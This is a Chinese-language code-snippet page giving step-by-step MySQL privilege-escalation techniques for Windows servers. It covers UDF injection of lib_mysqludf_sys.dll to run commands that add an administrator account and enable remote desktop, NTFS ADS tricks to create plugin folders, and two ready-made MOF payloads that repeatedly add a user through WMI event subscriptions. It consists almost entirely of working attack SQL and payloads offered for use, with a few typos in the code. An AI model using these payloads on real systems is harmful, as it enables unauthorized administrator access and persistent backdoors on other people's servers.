首页 > 代码库 > MySQL提权
MySQL提权
1、利用sqlmap的UDF提权
1.找个可写的目录上传lib_mysqludf_sys.dll,根据mysql的版本导入到windows\system32或者mysql的\lib\plugin目录下
select @@plugin_dir
select load_flie(‘C:\\RECYCLER\\lib_mysqludf_sys.dll‘) into dumpfile ‘C:\\windows\\system32\\lib_mysqludf_sys.dll‘
2.创建函数执行命令
create function cmd returns string soname ‘lib_mysqludf_sys.dll‘;select cmd(‘net user mrxt 123456 /add‘);select cmd(‘net localgroup administrators mrxt /add‘);select cmd(‘regedit /s C:\\3389.reg‘); drop function cmd;delete from mysql.func where name=‘cmd‘
3.某些情况下遇到Can‘t open shared library的情况,需要把DLL导出到lib\plugin目录下才可以,如果不存在,则可以用NTFS ADS流来创建文件夹的方法
select ‘dll file‘ into dumpfile ‘C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\::$INDEX_ALLOCATION‘;//创建lib目录select ‘dll file‘ into dumpfile ‘C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION‘;//创建plugin目录
2.MOF提权
找个可写目录上传MOF文件,比如C:\RECYCLER\
这个payload利用的是WScript.Shell
#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{ EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{ Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user mrxt 123456 /add\")";};instance of __FilterToConsumerBinding{ Consumer = $Consumer; Filter = $EventFilter;};
这个payload利用的是User.Shell
#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{ EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{Name = "consPCSV2";ScriptingEngine = "JScript";ScriptText ="var WSH = new ActiveXObject(\"Shell.Users\")\nz=WSH.create(\"NewUser\")\nz.changePassword(\"123456\", \"\")\nz.setting(\"AccountType\")=3";};instance of __FilterToConsumerBinding{ Consumer = $Consumer; Filter = $EventFilter;};
然后导出到c:/windows/system32/wbem/mof/目录下
select load_file(‘C:\\wmpub\\nullevt.mof‘) into dumpfile ‘c:\\windows\\system32\\wbem\\mof\\nullevt.mof‘
这个方法会不停的添加用户,执行net stop winmgmt 然后删除文件即可
参考文章:
http://www.waitalone.cn/mysql-tiquan-summary.html
http://zone.wooyun.org/content/1795
http://www.exploit-db.com/exploits/23083/
MySQL提权
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。